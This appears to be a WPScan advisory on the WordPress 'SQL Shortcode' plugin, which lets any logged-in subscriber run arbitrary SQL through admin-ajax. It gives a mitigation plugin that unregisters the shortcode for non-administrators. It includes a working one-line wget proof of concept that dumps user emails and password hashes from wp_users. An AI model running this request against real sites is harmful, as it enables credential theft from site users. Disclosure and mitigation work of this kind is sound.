SQL Shortcode <= 1.1 - Authenticated SQL Execution



Description
Strictly speaking this is not an SQL injection: the plugin's [sql] shortcode simply executes the SQL it is given, and because shortcodes can be rendered through admin-ajax by any logged-in user, an account as low-privileged as a subscriber can run it. The plugin description says it all.

This great article (https://blog.sucuri.net/2016/08/sql-injection-vulnerability-ninja-forms.html) explains how shortcodes can be triggered by low-privileged users through admin-ajax and why this works.

Vulnerabilities:

Any authenticated user (a subscriber is enough) can execute whatever SQL they want.

Found by:

Paul Dannewitz

Other vulnerabilities I submitted to wpvulndb: https://wpvulndb.com/search?utf8=%E2%9C%93&text=Paul+Dannewitz

Proof of Concept
wget --load-cookies cookie_file_with_cookies_of_just_a_subscriber_account.txt --post-data="action=parse-media-shortcode&shortcode=[sql]SELECT user_email, user_pass FROM wp_users[/sql]" wordpress.app/wp-admin/admin-ajax.php

Make sure the cookie file is in the Netscape format that wget's --load-cookies expects; a useful converter: http://crdx.org/misc/cookies/
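Until the plugin is removed or fixed, a site owner can keep the [sql] tag from being rendered for anyone who is not an administrator. The must-use plugin below is an added example written for this page, not code from the SQL Shortcode plugin or from WordPress core; it assumes the plugin registers its shortcode under the tag "sql" no later than the default init priority, and it treats the manage_options capability as the line between administrators and everyone else (both are assumptions, the capability choice is the site owner's). Because the parse-media-shortcode admin-ajax action used in the PoC runs through the normal WordPress bootstrap, the init hook fires for it as well as for ordinary page loads, so one removal covers both paths.

```php
<?php
/**
 * Plugin Name: Restrict [sql] shortcode to administrators
 * Description: Drop this file into wp-content/mu-plugins/. It unregisters
 *              the [sql] shortcode for every request made by a user who
 *              lacks the manage_options capability (logged-out users
 *              included), so the tag is left in the output as literal text
 *              instead of being executed.
 *
 * Added example for illustration; not part of the SQL Shortcode plugin.
 * Assumptions: the plugin registers the tag "sql" at init priority <= 10,
 * and manage_options is the right capability boundary for this site.
 */

add_action( 'init', function () {
    // init fires both for front-end/admin page loads and for
    // wp-admin/admin-ajax.php, which is where parse-media-shortcode
    // renders arbitrary shortcodes for any logged-in user.
    if ( ! current_user_can( 'manage_options' ) ) {
        // Priority 99 (below) runs after the plugin's own registration, so
        // the tag is gone before any content or AJAX response is rendered.
        remove_shortcode( 'sql' );
    }
}, 99 );
```

A quick check after deploying: log in as a subscriber and render a post containing `[sql]SELECT 1[/sql]`; the tag should appear verbatim in the output rather than being replaced by query results. If the plugin happens to register its shortcode later than init priority 99, raise the priority or move the hook to `wp_loaded`, which fires after init completes.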

Affects Plugin

References

URL https://wordpress.org/plugins/sql-shortcode/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Paul Dannewitz
Submitter Twitter padannewitz
Views 138
Verified No
WPVDB ID 8904

Timeline

Publicly Published 2017-09-02
Added 2017-09-20
Last Updated 2017-09-20

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.